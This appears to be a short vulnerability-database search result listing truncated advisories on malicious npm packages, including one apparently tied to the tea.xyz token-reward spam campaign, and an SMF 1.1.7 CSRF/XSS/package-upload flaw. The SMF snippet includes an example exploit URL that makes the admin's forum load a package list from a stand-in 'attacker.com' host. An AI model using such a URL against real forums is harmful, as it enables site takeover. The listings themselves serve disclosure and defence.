3 matches found
Malicious code in arif-sroto13-sukiwir (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fa1550be9ec203af5e5731a4c5e206fa8f7f1ffcbed5edc5e215e33e4faae97e This package appears to be part of the tea.xyz token reward campaign that flooded npm. These packages typically contain autopublish scripts auto.js,...
EUVD-2018-12716
Malware in sbrugna...
Simple Machines Forum (SMF) 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload
Author: Xianur0 Vulnerable Version: All The Bug is located in the file: Sources/PackageGet.php Example: http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com When the admin link between the SMF to load the file: http://attacker.com/packages.xml Save this file as...